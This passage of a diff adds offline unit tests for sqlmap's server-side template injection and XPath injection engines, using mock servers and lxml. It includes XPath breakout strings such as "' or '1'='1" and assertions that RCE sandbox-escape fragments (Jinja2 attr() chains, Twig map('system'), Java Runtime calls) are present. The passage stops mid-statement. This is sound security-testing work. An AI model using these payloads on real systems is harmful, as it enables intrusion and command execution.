+class TestCrossEngineDisambiguation(unittest.TestCase):
+ def setUp(self):
+ self.original_send = ssti._send
+
+ def tearDown(self):
+ ssti._send = self.original_send
+
+ def test_jinja2_preferred_over_twig_via_boolean_rendering(self):
+ """Jinja2 and Twig share {{ }} but differ in boolean rendering.
+ Jinja2 renders True as 'True', Twig renders true as '1'.
+ Our detection uses trueRendered for intrinsic discrimination."""
+ import re
+
+ def mock(place, parameter, value):
+ m = re.search(r"\{\{ (\d+)\*(\d+)", value)
+ if m:
+ return "Hello %d" % (int(m.group(1)) * int(m.group(2)))
+ # Twig-style boolean rendering (true -> 1, false -> empty)
+ if "{{ true }}" in value:
+ return "Hello 1"
+ if "{{ false }}" in value:
+ return "Hello "
+ if "{{ True }}" in value:
+ return "Hello 1" # Jinja2 True payload would not match this
+ return "Hello " + value
+
+ ssti._send = mock
+ engine, evidence = ssti._fingerprint("GET", "q")
+ self.assertIsNotNone(engine)
+ # Twig should win because its boolean payloads match the mock
+ self.assertIn("Twig", engine.name)
+
+
+class TestExpressionEvaluation(unittest.TestCase):
+ def setUp(self):
+ self.original_send = ssti._send
+
+ def tearDown(self):
+ ssti._send = self.original_send
+
+ def test_eval_uses_expressionFmt(self):
+ engine = ssti._ENGINE_TABLE[0] # Jinja2: expressionFmt = "{{ %s }}"
+ results = []
+
+ def mock(place, parameter, value):
+ results.append(value)
+ return "Hello __marker__ 49 __marker2__"
+
+ ssti._send = mock
+ ssti._evalExpression("GET", "q", engine, "7*7")
+ # Payload must use expressionFmt, not raw delimiter concatenation
+ self.assertIn("{{ ", results[0])
+ self.assertIn(" }}", results[0])
+
+ def test_eval_falls_back_when_no_expressionFmt(self):
+ engine = [e for e in ssti._ENGINE_TABLE if e.name == "Handlebars"][0]
+ self.assertEqual(engine.expressionFmt, "")
+
+ def mock(place, parameter, value):
+ return "irrelevant"
+
+ ssti._send = mock
+ # Should not raise; just logs error
+ ssti._evalExpression("GET", "q", engine, "7*7")
+
+
+class TestBooleanUniqueness(unittest.TestCase):
+ def test_jinja2_boolean_unique_among_curlies(self):
+ jinja2 = ssti._ENGINE_TABLE[0]
+ self.assertTrue(ssti._booleanUniquelyIdentifies(jinja2))
+
+ def test_freemarker_boolean_unique_with_computer_format(self):
+ freemarker = [e for e in ssti._ENGINE_TABLE if e.name == "Freemarker"][0]
+ # FreeMarker uses ${true?c} (computer-format), distinct from SpringEL's ${true} and
+ # Mako's ${True}, so its boolean rendering now uniquely identifies it within the ${ } family
+ self.assertTrue(ssti._booleanUniquelyIdentifies(freemarker))
+ spring = [e for e in ssti._ENGINE_TABLE if "Spring" in e.name][0]
+ self.assertTrue(ssti._booleanUniquelyIdentifies(spring))
+
+ def test_jinja2_with_arithmetic_and_boolean_is_exact(self):
+ """Arithmetic + boolean (unique) should produce exact engine name,
+ not a family/probable guess."""
+ import re
+
+ def mock(place, parameter, value):
+ m = re.search(r"\{\{ (\d+)\*(\d+)", value)
+ if m:
+ return "Hello %d" % (int(m.group(1)) * int(m.group(2)))
+ if "True" in value:
+ return "Hello True"
+ if "False" in value:
+ return "Hello False"
+ return "Hello " + value
+
+ ssti._send = mock
+ engine, evidence = ssti._fingerprint("GET", "q")
+ self.assertIsNotNone(engine)
+ # Boolean is unique -> should NOT be marked "(probable"
+ self.assertNotIn("(probable", engine.name)
+ self.assertIn("Jinja2", engine.name)
+
+
+class TestTakeoverGate(unittest.TestCase):
+ def test_can_takeover_exact_engine_with_proof(self):
+ engine = ssti._ENGINE_TABLE[0] # Jinja2
+ evidence = {"arithmetic": True, "boolean": True}
+ self.assertTrue(ssti._canTakeover(engine, evidence))
+
+ def test_cannot_takeover_probable_engine(self):
+ engine = ssti._ENGINE_TABLE[0]._replace(name="Jinja2/Twig/Handlebars-like (probable Jinja2)")
+ evidence = {"arithmetic": True}
+ self.assertFalse(ssti._canTakeover(engine, evidence))
+
+ def test_cannot_takeover_without_proof(self):
+ engine = ssti._ENGINE_TABLE[0]
+ evidence = {}
+ self.assertFalse(ssti._canTakeover(engine, evidence))
+
+ def test_cannot_takeover_without_payloads(self):
+ engine = [e for e in ssti._ENGINE_TABLE if e.name == "Handlebars"][0]
+ evidence = {"arithmetic": True}
+ self.assertFalse(ssti._canTakeover(engine, evidence))
+
+
+class TestRequestMutation(unittest.TestCase):
+ """Verify _replaceSegment() correctly mutates parameter strings."""
+
+ def setUp(self):
+ self.original_send = ssti._send
+ self._orig_params = dict(ssti.conf.parameters) if hasattr(ssti.conf, 'parameters') else {}
+ self._orig_paramDict = dict(ssti.conf.paramDict) if hasattr(ssti.conf, 'paramDict') else {}
+ self._orig_cookieDel = getattr(ssti.conf, 'cookieDel', None)
+
+ def tearDown(self):
+ ssti._send = self.original_send
+ if hasattr(ssti.conf, 'parameters'):
+ ssti.conf.parameters.clear()
+ ssti.conf.parameters.update(self._orig_params)
+ if hasattr(ssti.conf, 'paramDict'):
+ ssti.conf.paramDict.clear()
+ ssti.conf.paramDict.update(self._orig_paramDict)
+ if self._orig_cookieDel is not None:
+ ssti.conf.cookieDel = self._orig_cookieDel
+
+ def test_replace_segment_single_param(self):
+ ssti.conf.parameters = {"GET": "q=x"}
+ result = ssti._replaceSegment("GET", "q", "test")
+ self.assertEqual(result, "q=test")
+
+ def test_replace_segment_multi_param(self):
+ ssti.conf.parameters = {"GET": "q=x&a=1&b=2"}
+ result = ssti._replaceSegment("GET", "a", "99")
+ self.assertEqual(result, "q=x&a=99&b=2")
+
+ def test_replace_segment_post(self):
+ ssti.conf.parameters = {"POST": "user=admin&pass=secret"}
+ result = ssti._replaceSegment("POST", "pass", "newpass")
+ self.assertEqual(result, "user=admin&pass=newpass")
+
+ def test_replace_segment_cookie_delim(self):
+ from lib.core.enums import PLACE
+ ssti.conf.parameters = {PLACE.COOKIE: "a=1;b=2"}
+ ssti.conf.cookieDel = ";"
+ result = ssti._replaceSegment(PLACE.COOKIE, "b", "xx")
+ self.assertEqual(result, "a=1;b=xx")
+
+ def test_replace_segment_missing_param(self):
+ ssti.conf.parameters = {"GET": "a=1"}
+ ssti.conf.paramDict = {"GET": {"a": "1", "b": "2"}}
+ result = ssti._replaceSegment("GET", "b", "xx")
+ self.assertEqual(result, "a=1&b=xx")
+
+
+class TestExecuteCommand(unittest.TestCase):
+ def setUp(self):
+ self.original_send = ssti._send
+ self.original_dumper = getattr(ssti.conf, 'dumper', None)
+ # Provide a mock dumper so _executeCommand doesn't crash on conf.dumper
+ from lib.core.datatype import AttribDict
+ ssti.conf.dumper = AttribDict()
+ ssti.conf.dumper.singleString = lambda msg: None
+
+ def tearDown(self):
+ ssti._send = self.original_send
+ if self.original_dumper is not None:
+ ssti.conf.dumper = self.original_dumper
+
+ def test_error_page_skipped(self):
+ """RCE payload that triggers a template error is skipped; next payload tried."""
+ engine = ssti._ENGINE_TABLE[0] # Jinja2
+ calls = []
+
+ def mock(place, parameter, value):
+ calls.append(value)
+ if "cycler" in value:
+ return "jinja2.exceptions.UndefinedError: 'cycler' is undefined"
+ if "config" in value:
+ return "Hello output-from-config"
+ return "Hello " + value
+
+ ssti._send = mock
+ ssti._executeCommand("GET", "q", engine, "test")
+ # Should skip cycler (error) and use config (valid output)
+ self.assertTrue(any("config" in c for c in calls),
+ "Should have tried the second payload after error skip")
+
+ def test_all_error_pages_produce_warning(self):
+ """When all RCE payloads produce template errors, no success is reported.
+ _executeCommand sends baseline + one request per fallback payload."""
+ engine = ssti._ENGINE_TABLE[0]
+ calls = []
+
+ def mock(place, parameter, value):
+ calls.append(value)
+ return "jinja2.exceptions.TemplateSyntaxError: unexpected token"
+
+ ssti._send = mock
+ ssti._executeCommand("GET", "q", engine, "test")
+ # 1 baseline + N payload attempts = N+1 calls
+ self.assertEqual(len(calls), len(engine.rcePayloads) + 1,
+ "Should have tried all payloads (baseline + one per fallback) before giving up")
+
+
+class TestCommandEscaping(unittest.TestCase):
+ def test_escape_single_quoted(self):
+ self.assertEqual(ssti._escapeSingleQuoted("hello"), "hello")
+ self.assertEqual(ssti._escapeSingleQuoted("it's"), "it\\'s")
+ self.assertEqual(ssti._escapeSingleQuoted("a\\b"), "a\\\\b")
+
+
+class TestEngineMatrix(unittest.TestCase):
+ """For EVERY engine in the table, stand up a faithful mock server running that
+ engine and assert _fingerprint() identifies it. This proves each engine's full
+ detection path (arithmetic/boolean/error/distinguishing) actually works end to
+ end - not just Jinja2 - and guards against regressions like the ERB '%>' format
+ bug where a delimiter containing '%' silently disabled arithmetic detection."""
+
+ def setUp(self):
+ self.original_send = ssti._send
+
+ def tearDown(self):
+ ssti._send = self.original_send
+
+ # Digit-free, boolean-word-free sample errors that match each engine's errorRegex.
+ # (digit/boolean-free so a sibling engine's boolean probe falling through to the error
+ # branch on this server is still correctly rejected.)
+ _ERRORS = {
+ "Jinja2": "jinja2.exceptions.TemplateSyntaxError: unexpected end of template",
+ "Mako": "mako.exceptions.SyntaxException: unclosed control structure",
+ "Twig": "Twig_Error_Syntax: unexpected token in template",
+ "Freemarker": "freemarker.core.ParseException: encountered unexpected directive",
+ "Velocity": "org.apache.velocity.runtime.parser.ParseErrorException: encountered eof",
+ "Spring EL / Thymeleaf": "org.springframework.expression.spel.SpelParseException: bad node",
+ "ERB": "(erb): syntax error, unexpected end-of-input",
+ "Pug/Jade": "pug: unexpected token in template",
+ "Handlebars": "Handlebars: Parse error on line one",
+ }
+
+ # Real divide-by-zero error text per language family (captured from live Mako/ERB/Jinja2
+ # backends), so the S2 family probe can be exercised. JS yields Infinity (no error).
+ _DIVZERO = {
+ "python": "ZeroDivisionError: division by zero",
+ "ruby": "ZeroDivisionError: divided by 0",
+ "php": "DivisionByZeroError: Division by zero",
+ "java": "java.lang.ArithmeticException: / by zero",
+ "nodejs": "Hello Infinity",
+ }
+
+ @staticmethod
+ def _make_server(engine, errors):
+ import re
+ op = re.escape(engine.delimiter)
+ cl = re.escape(engine.delimiterClose)
+ arithRe = re.compile(op + r"\s*(\d+)\s*\*\s*(\d+)\s*" + cl) if engine.arithmeticFmt else None
+ divZero = TestEngineMatrix._DIVZERO
+ err = errors.get(engine.name)
+
+ def server(place, parameter, value):
+ # 1) engine-specific distinguishing probe
+ if engine.distinguishingProbe and engine.distinguishingProbe in value:
+ if engine.distinguishingResult:
+ return "Hello " + engine.distinguishingResult
+ return "Hello" # comment-style probe -> stays at baseline
+ # 2) this engine's own boolean rendering
+ if engine.booleanTrue and engine.booleanTrue in value:
+ return "Hello " + engine.trueRendered
+ if engine.booleanFalse and engine.booleanFalse in value:
+ return "Hello " + engine.falseRendered
+ # 3) divide-by-zero -> language-family-specific error (S2), for engines that evaluate it
+ if arithRe is not None and (engine.delimiter + "1/0" + engine.delimiterClose) in value:
+ return divZero.get(engine.family, "Hello")
+ # 4) arithmetic, but ONLY for engines that actually evaluate it
+ if arithRe is not None:
+ m = arithRe.search(value)
+ if m:
+ return "Hello %d" % (int(m.group(1)) * int(m.group(2)))
+ # 5) malformed fragment in this engine's delimiter -> engine-specific error
+ if err and any(p in value for p in engine.errorProbes):
+ return err
+ # 6) anything else (incl. other engines' payloads) renders inertly
+ return "Hello"
+
+ return server
+
+ def test_every_engine_is_fingerprinted(self):
+ for engine in ssti._ENGINE_TABLE:
+ ssti._send = self._make_server(engine, self._ERRORS)
+ result, evidence = ssti._fingerprint("GET", "q")
+ self.assertIsNotNone(result, "engine '%s' was not detected at all" % engine.name)
+ self.assertIn(engine.name, result.name,
+ "server running '%s' was identified as '%s'" % (engine.name, result.name))
+
+ def test_family_probe_confirms_language(self):
+ # S2: the divide-by-zero probe must confirm the backend family for every
+ # expression-evaluating, non-JS engine (Python/Ruby/PHP/Java).
+ for engine in ssti._ENGINE_TABLE:
+ if not (engine.arithmeticFmt and engine.delimiterClose):
+ continue
+ if engine.family not in ("python", "ruby", "php", "java"):
+ continue
+ ssti._send = self._make_server(engine, self._ERRORS)
+ _result, evidence = ssti._fingerprint("GET", "q")
+ self.assertTrue(evidence.get("family"),
+ "family probe should confirm '%s' on a %s backend" % (engine.name, engine.family))
+
+ def test_filter_evasion_rce_fallbacks_present(self):
+ # S3: each engine must retain its filter-evasion / sandbox-escape RCE fallbacks.
+ def rce(name):
+ return " ".join(p for p, _d in next(e for e in ssti._ENGINE_TABLE if e.name == name).rcePayloads)
+ jinja = rce("Jinja2")
+ self.assertIn("attr(", jinja) # dot/underscore-free attr() chain
+ self.assertIn("\\x5f", jinja) # hex-escaped dunders
+ twig = rce("Twig")
+ self.assertIn("sort('system')", twig)
+ self.assertIn("map('system')", twig)
+ spring = rce("Spring EL / Thymeleaf")
+ self.assertIn("readLine", spring) # output-capturing SpEL
+ self.assertIn("@java.lang.Runtime@getRuntime", spring) # OGNL fallback
+
+ def test_family_probe_does_not_crossmatch(self):
+ # Python 'division by zero' must NOT satisfy the (case-sensitive) PHP signature, so a
+ # Jinja2/Python server never lets Twig/PHP claim a family match.
+ jinja = next(e for e in ssti._ENGINE_TABLE if e.name == "Jinja2")
+ ssti._send = self._make_server(jinja, self._ERRORS)
+ cache = {}
+ twig = next(e for e in ssti._ENGINE_TABLE if e.name == "Twig")
+ self.assertEqual(ssti._probeFamily("GET", "q", jinja, cache), "python")
+ self.assertNotEqual(ssti._probeFamily("GET", "q", twig, cache), twig.family)
+
+ def test_erb_arithmetic_works_after_format_fix(self):
+ # Direct regression guard for the '<%= %d*%d %>' / '<%= %s %>' format bug.
+ erb = next(e for e in ssti._ENGINE_TABLE if e.name == "ERB")
+ ssti._send = self._make_server(erb, self._ERRORS)
+ self.assertTrue(ssti._probeArithmetic("GET", "q", erb),
+ "ERB arithmetic proof must succeed once %-format no longer crashes on '%>'")
+ result, evidence = ssti._fingerprint("GET", "q")
+ self.assertEqual(result.name, "ERB")
+ self.assertTrue(evidence.get("arithmetic"))
+
+ def test_mako_distinguished_from_freemarker_spring(self):
+ # Mako shares '${ }' with Freemarker/Spring but renders capital True/False;
+ # it must be named exactly (via unique boolean rendering), not "probable".
+ mako = next(e for e in ssti._ENGINE_TABLE if e.name == "Mako")
+ ssti._send = self._make_server(mako, self._ERRORS)
+ result, evidence = ssti._fingerprint("GET", "q")
+ self.assertEqual(result.name, "Mako")
+ self.assertTrue(evidence.get("boolean"))
diff --git a/tests/test_xpath.py b/tests/test_xpath.py
new file mode 100644
index 0000000000..2c3dcfac1a
--- /dev/null
+++ b/tests/test_xpath.py
@@ -0,0 +1,443 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
+See the file 'LICENSE' for copying permission
+
+Offline, deterministic tests for the XPath injection engine. Mock oracles stand in for the
+HTTP layer so detection, fingerprinting, blind inference, payload building, and output
+formatting run without a live target; the real-XPath checks use lxml and skip without it.
+"""
+
+import unittest
+
+from _testutils import bootstrap
+bootstrap()
+
+import lib.techniques.xpath.inject as xpath
+
+
+SENTINEL = xpath.SENTINEL
+
+
+class TestHelpers(unittest.TestCase):
+ def test_ratio(self):
+ self.assertGreater(xpath._ratio("abc", "abc"), 0.9)
+ self.assertLess(xpath._ratio("abc", "xyz"), 0.5)
+
+ def test_delim(self):
+ from lib.core.enums import PLACE
+ self.assertEqual(xpath._delim(PLACE.GET), '&')
+ self.assertEqual(xpath._delim(PLACE.COOKIE), ';')
+
+ def test_is_error(self):
+ self.assertTrue(xpath._isError("javax.xml.xpath.XPathExpressionException: error"))
+ self.assertTrue(xpath._isError("lxml.etree.XPathEvalError: Invalid expression"))
+ self.assertFalse(xpath._isError("normal page content"))
+
+ def test_backend_from_error(self):
+ self.assertIsNotNone(xpath._backendFromError("lxml.etree.XPathEvalError: Invalid expression"))
+ self.assertIsNotNone(xpath._backendFromError("System.Xml.XPath.XPathException: has an invalid token"))
+ self.assertIsNone(xpath._backendFromError("normal page"))
+
+ def test_is_password_param(self):
+ self.assertTrue(xpath._isPasswordParam("password"))
+ self.assertTrue(xpath._isPasswordParam("pass"))
+ self.assertFalse(xpath._isPasswordParam("username"))
+
+ def test_xpath_quote(self):
+ self.assertEqual(xpath._xpathQuote("hello"), "'hello'")
+ self.assertEqual(xpath._xpathQuote("it's"), "\"it's\"")
+ self.assertEqual(xpath._xpathQuote('say "hi"'), "'say \"hi\"'")
+ both = "it's \"great\""
+ q = xpath._xpathQuote(both)
+ self.assertIn("concat", q)
+
+ def test_make_payload_with_suffix(self):
+ b = xpath.Boundary("') or ", " or ('", True)
+ p = xpath._makePayload("x", b, "starts-with(name(/*),'d')")
+ self.assertEqual(p, "x') or starts-with(name(/*),'d') or ('")
+
+ def test_make_payload_no_suffix(self):
+ b = xpath.Boundary("' or ", "", True)
+ p = xpath._makePayload("x", b, "1=1")
+ self.assertEqual(p, "x' or 1=1")
+
+ def test_make_payload_with_suffix_only(self):
+ b = xpath.Boundary("' or ", " and '1'='1", True)
+ p = xpath._makePayload("x", b, "1=1")
+ self.assertEqual(p, "x' or 1=1 and '1'='1")
+
+
+class TestBoundaryTable(unittest.TestCase):
+ def test_all_entries_in_boundary_lookup(self):
+ for bk in xpath.XPATH_BREAKOUT_PREFIXES:
+ self.assertIn(bk, xpath._BREAKOUT_BOUNDARY,
+ "Breakout '%s' not found in _BREAKOUT_BOUNDARY" % bk)
+
+ def test_function_arg_boundaries_are_extractable(self):
+ for bk in ("') or true() or ('", "') or '1'='1' or ('", "') or 1=1 or ('"):
+ b = xpath._BREAKOUT_BOUNDARY[bk]
+ self.assertTrue(b.extractable)
+ self.assertTrue(len(b.prefix) > 0)
+ self.assertTrue(len(b.suffix) > 0)
+
+ def test_simple_string_boundaries_have_suffix(self):
+ for bk in ("' or '1'='1", "' or true() or '", "' or 1=1 or '",
+ '" or "1"="1', '" or true() or "'):
+ b = xpath._BREAKOUT_BOUNDARY[bk]
+ if b is not None:
+ self.assertTrue(b.extractable)
+ self.assertTrue(len(b.suffix) > 0,
+ "Simple string breakout '%s' needs a suffix to absorb the trailing quote" % bk)
+
+ def test_union_wildcard_is_not_extractable(self):
+ b = xpath._BREAKOUT_BOUNDARY.get("']|//*|test['")
+ self.assertIsNone(b, "Union wildcard must not have an extraction boundary")
+
+ def test_numeric_has_leading_space(self):
+ for bk in (" or 1=1", " or true()"):
+ self.assertTrue(bk.startswith(" "),
+ "Numeric breakout '%s' needs leading whitespace" % bk)
+ b = xpath._BREAKOUT_BOUNDARY[bk]
+ self.assertTrue(b.extractable)
+
+ def test_all_extractable_have_prefix(self):
+ for bk, b in xpath._BREAKOUT_BOUNDARY.items():
+ if b is not None:
+ self.assertTrue(len(b.prefix) > 0,
+ "Extractable boundary for '%s' needs a prefix" % bk)
+
+
+class TestPayloadBuilder(unittest.TestCase):
+ def setUp(self):
+ self.boundary = xpath._BREAKOUT_BOUNDARY["') or true() or ('"]
+ self.builder = xpath._XPathPayloadBuilder("x", self.boundary)
+
+ def test_name_starts_with(self):
+ p = self.builder.nameStartsWith("/*", "d")
+ self.assertIn("starts-with(name(/*)", p)
+ self.assertIn("'d'", p)
+
+ def test_name_length(self):
+ p = self.builder.nameLength("/*", 9)
+ self.assertIn("string-length(name(/*))=9", p)
+
+ def test_child_count(self):
+ p = self.builder.childCount("/*", 3)
+ self.assertIn("count(/*/*)>=3", p)
+
+ def test_attribute_count(self):
+ p = self.builder.attributeCount("/*[1]", 2)
+ self.assertIn("count(/*[1]/@*)>=2", p)
+
+ def test_text_starts_with(self):
+ p = self.builder.textStartsWith("/*[1]/*[1]", "lut")
+ self.assertIn("starts-with(string(/*[1]/*[1])", p)
+
+ def test_empty_prefix(self):
+ p = self.builder.nameStartsWith("/*", "")
+ self.assertIn("''", p)
+
+ def test_uses_boundary_not_hardcoded(self):
+ p = self.builder.nameStartsWith("/*", "d")
+ self.assertNotIn("contains(username", p)
+ self.assertIn("x') or ", p)
+ self.assertIn(" or ('", p)
+
+ def test_simple_string_boundary_builder(self):
+ b = xpath._BREAKOUT_BOUNDARY["' or '1'='1"]
+ builder = xpath._XPathPayloadBuilder("x", b)
+ p = builder.nameStartsWith("/*", "d")
+ self.assertIn("x' or ", p)
+ self.assertIn(" and '1'='1", p)
+
+
+class TestBooleanDetection(unittest.TestCase):
+ def setUp(self):
+ self.original_send = xpath._send
+
+ def tearDown(self):
+ xpath._send = self.original_send
+
+ def test_false_page_must_be_reproducible(self):
+ # True is stable, false changes every time -> no oracle
+ true_calls = [0]
+
+ def mock(place, parameter, value):
+ if "true()" in value:
+ return "true-page"
+ elif "false()" in value:
+ true_calls[0] += 1
+ return "false-page-%d" % true_calls[0]
+ return "default"
+
+ xpath._send = mock
+ template, payload, boundary = xpath._detectBoolean("GET", "q")
+ self.assertIsNone(template)
+
+ def test_detection_returns_extractable_boundary(self):
+ def mock(place, parameter, value):
+ if "true()" in value:
+ return '{"count":7,"entries":[{...}]}'
+ elif "false()" in value:
+ return '{"count":0,"entries":[],"error":null}'
+ return "default"
+
+ xpath._send = mock
+ template, payload, boundary = xpath._detectBoolean("GET", "q")
+ self.assertIsNotNone(template)
+ self.assertIsNotNone(boundary)
+ self.assertTrue(boundary.extractable)
+
+
+class TestGridAndTable(unittest.TestCase):
+ def test_grid(self):
+ columns = ["Path", "Element", "Value"]
+ rows = [["/*", "root", ""], ["/*[1]", "child", "text"]]
+ grid = xpath._grid(columns, rows)
+ self.assertIn("Path", grid)
+ self.assertIn("root", grid)
+
+ def test_grid_empty(self):
+ grid = xpath._grid([], [])
+ self.assertIn("+", grid)
+
+ def test_tree_to_table(self):
+ node = {
+ "name": "directory", "path": "/*",
+ "children": [{"name": "user", "path": "/*[1]", "children": [],
+ "attributes": [{"name": "id", "value": "1"}], "text": None}],
+ "attributes": [], "text": None,
+ }
+ columns, rows = xpath._treeToTable(node)
+ self.assertIn("Path", columns)
+ self.assertGreater(len(rows), 0)
+
+
+class TestExtraction(unittest.TestCase):
+ def test_infer_value_mock(self):
+ expected = "directory"
+ boundary = xpath._BREAKOUT_BOUNDARY["') or true() or ('"]
+ builder = xpath._XPathPayloadBuilder("x", boundary)
+
+ class MockOracle(object):
+ def extract(self, payload):
+ import re
+ m = re.search(r"""starts-with\(name\(/\*\),'([^']*)'\)""", payload)
+ return expected.startswith(m.group(1)) if m else False
+
+ oracle = MockOracle()
+ result = xpath._inferValue(oracle, builder, "/*",
+ lambda b, p, prefix: b.nameStartsWith(p, prefix),
+ maxLen=20)
+ self.assertEqual(result, expected)
+
+ def test_infer_count(self):
+ expected = 3
+ boundary = xpath._BREAKOUT_BOUNDARY["') or true() or ('"]
+ builder = xpath._XPathPayloadBuilder("x", boundary)
+
+ class MockOracle(object):
+ def extract(self, payload):
+ import re
+ m = re.search(r"count\(/\*/\*\)>=(\d+)", payload)
+ if m:
+ return int(m.group(1)) <= expected
+ return False
+
+ oracle = MockOracle()
+ result = xpath._inferCount(oracle, builder, "/*",
+ lambda b, p, c: b.childCount(p, c),
+ maxCount=8)
+ self.assertEqual(result, expected)
+
+ def test_infer_string_binary_search(self):
+ # Drive the binary-search extractor through real lxml evaluation of the
+ # boundary-wrapped predicates against _XML and confirm exact recovery.
+ boundary = xpath._BREAKOUT_BOUNDARY["') or true() or ('"]
+ builder = xpath._XPathPayloadBuilder("x", boundary)
+ template = _XPATH_TEMPLATES["function_arg"]
+
+ class MockOracle(object):
+ def extract(self, payload):
+ return _xpath_eval(template, payload) > 0
+
+ oracle = MockOracle()
+ # Absolute targets are resolved the same way the live tree-walk would.
+ self.assertEqual(xpath._inferString(oracle, builder, "name(/*)", maxLen=32), "directory")
+ self.assertEqual(xpath._inferString(oracle, builder, "string(//user[1]/name)", maxLen=32), "luther")
+ self.assertEqual(xpath._inferString(oracle, builder, "string(//user[1]/@id)", maxLen=32), "1")
+
+ def test_infer_string_matches_linear(self):
+ # The fast extractor must agree with the legacy linear extractor.
+ boundary = xpath._BREAKOUT_BOUNDARY["') or true() or ('"]
+ builder = xpath._XPathPayloadBuilder("x", boundary)
+ template = _XPATH_TEMPLATES["function_arg"]
+
+ class MockOracle(object):
+ def extract(self, payload):
+ return _xpath_eval(template, payload) > 0
+
+ oracle = MockOracle()
+ fast = xpath._inferString(oracle, builder, "name(/*)", maxLen=32)
+ linear = xpath._inferValue(oracle, builder, "/*",
+ lambda b, p, prefix: b.nameStartsWith(p, prefix),
+ maxLen=32)
+ self.assertEqual(fast, linear)
+
+
+class TestBackendFingerprint(unittest.TestCase):
+ def test_lxml(self):
+ page = "lxml.etree.XPathEvalError: Invalid expression"
+ backend = xpath._backendFromError(page)
+ self.assertIsNotNone(backend)
+ self.assertIn("lxml", backend)
+
+ def test_java_jaxp(self):
+ page = "javax.xml.xpath.XPathExpressionException: A location path was expected"
+ backend = xpath._backendFromError(page)
+ self.assertIsNotNone(backend)
+
+ def test_dotnet(self):
+ page = "System.Xml.XPath.XPathException: Expression must evaluate to a node-set"
+ backend = xpath._backendFromError(page)
+ self.assertIsNotNone(backend)
+
+ def test_no_error(self):
+ page = "Normal page with user data"
+ backend = xpath._backendFromError(page)
+ self.assertIsNone(backend)
+
+
+# --- Real XPath syntax validation (lxml) ---------------------------------------
+
+_XML = b"""<directory><user id="1"><name>luther</name></user><user id="2"><name>fluffy</name></user></directory>"""
+
+_XPATH_TEMPLATES = {
+ "function_arg": "//user[contains(name,'%s')]",
+ "single_quoted": "//user[name='%s']",
+ "double_quoted": '//user[name="%s"]',
+ "numeric": "//user[position()=%s]",
+ "bare_predicate": "//user[%s]",
+}
+
+
+def _xpath_eval(template, payload):
+ """Evaluate an XPath expression against _XML, return the match count."""
+ try:
+ from lxml import etree
+ except ImportError:
+ raise unittest.SkipTest("lxml not available")
+ root = etree.fromstring(_XML)
+ expr = template % payload
+ return len(root.xpath(expr))
+
+
+class TestRealXPathSyntax(unittest.TestCase):
+ """Verify that detection payloads and extraction predicates are syntactically
+ valid XPath and produce the expected boolean results."""
+
+ @staticmethod
+ def _count(template, payload):
+ return _xpath_eval(template, payload)
+
+ def _test_family(self, template_key, true_breakout, false_breakout, boundary_key, original="x"):
+ template = _XPATH_TEMPLATES[template_key]
+ boundary = xpath._BREAKOUT_BOUNDARY[boundary_key]
+ self.assertIsNotNone(boundary)
+ self.assertTrue(boundary.extractable)
+
+ # Detection payloads must be syntactically valid and yield true/false
+ truePayload = original + true_breakout
+ falsePayload = original + false_breakout
+ self.assertGreater(self._count(template, truePayload), 0,
+ "True payload '%s' should match at least one node" % truePayload)
+ self.assertEqual(self._count(template, falsePayload), 0,
+ "False payload '%s' should match no nodes" % falsePayload)
+
+ # Extraction predicate must be valid and change the result truthfully
+ self.assertIsNotNone(xpath._XPathPayloadBuilder(original, boundary))
+ truePred = xpath._makePayload(original, boundary, "true()")
+ falsePred = xpath._makePayload(original, boundary, "false()")
+ self.assertGreater(self._count(template, truePred), 0,
+ "Extraction true predicate must match")
+ self.assertEqual(self._count(template, falsePred), 0,
+ "Extraction false predicate must not match")
+
+ def test_function_arg_family(self):
+ self._test_family("function_arg",
+ "') or true() or ('", "') and false() and ('",
+ "') or true() or ('")
+
+ def test_single_quoted_family(self):
+ self._test_family("single_quoted",
+ "' or '1'='1", "' and '1'='2",
+ "' or '1'='1")
+
+ def test_double_quoted_family(self):
+ self._test_family("double_quoted",
+ '" or "1"="1', '" and "1"="2',
+ '" or "1"="1')
+
+ def test_numeric_family(self):
+ self._test_family("numeric",
+ " or 1=1", " and 1=2",
+ " or 1=1", original="1")
+
+ def test_bare_predicate_family(self):
+ self._test_family("bare_predicate",
+ " or true()", " and false()",
+ " or true()", original="1")
+
+ def test_function_arg_second_variant(self):
+ self._test_family("function_arg",
+ "') or '1'='1' or ('", "') and '1'='2' and ('",
+ "') or '1'='1' or ('")
+
+ def test_single_quoted_with_matching_original(self):
+ """When the original value matches a record (name='luther'), OR-style
+ extraction with 'and' suffix is still decisive because the engine uses
+ a non-matching sentinel base for tree-walking."""
+ boundary = xpath._BREAKOUT_BOUNDARY["' or '1'='1"]
+ # Simulate what xpathScan() does: use a sentinel as base for OR-style
+ sentinel = "zzznotpresent"
+ self.assertIsNotNone(xpath._XPathPayloadBuilder(sentinel, boundary))
+ truePred = xpath._makePayload(sentinel, boundary, "true()")
+ falsePred = xpath._makePayload(sentinel, boundary, "false()")
+ tpl = _XPATH_TEMPLATES["single_quoted"]
+ self.assertGreater(self._count(tpl, truePred), 0,
+ "OR extraction must match with sentinel base + true predicate")
+ self.assertEqual(self._count(tpl, falsePred), 0,
+ "OR extraction must not match with sentinel base + false predicate")
+
+ def test_all_extractable_boundaries_have_valid_extraction(self):
+ # Match each boundary to an appropriate template and original value.
+ _CONTEXT = {
+ "') or true() or ('": ("function_arg", "x"),
+ "') or '1'='1' or ('": ("function_arg", "x"),
+ "') or 1=1 or ('": ("function_arg", "x"),
+ '") or true() or ("': ("function_arg", "x"),
+ "' or '1'='1": ("single_quoted", "x"),
+ "' or true() or '": ("single_quoted", "x"),
+ "' or 1=1 or '": ("single_quoted", "x"),
+ "' and '1'='1": ("single_quoted", "x"),
+ '" or "1"="1': ("double_quoted", "x"),
+ '" or true() or "': ("double_quoted", "x"),
+ " or 1=1": ("numeric", "999"),
+ " or true()": ("bare_predicate", "999"),
+ }
+ for bk, boundary in xpath._BREAKOUT_BOUNDARY.items():
+ if boundary is None or not boundary.extractable:
+ continue
+ tkey, original = _CONTEXT.get(bk, ("function_arg", "x"))
+ template = _XPATH_TEMPLATES[tkey]
+ payload = xpath._makePayload(original, boundary, "true()")
+ try:
+ count = self._count(template, payload)
+ except unittest.SkipTest:
+ raise # lxml unavailable -> skip cleanly; SkipTest is an Exception, so the broad except below would otherwise mask it into a failure
+ except Exception as e:
+ self.fail("Boundary '%s' in '%s' with orig='%s' invalid: %s\n payload: %s" % (bk, tkey, original, e, payload))
+ self.assertIsInstance(count, int,
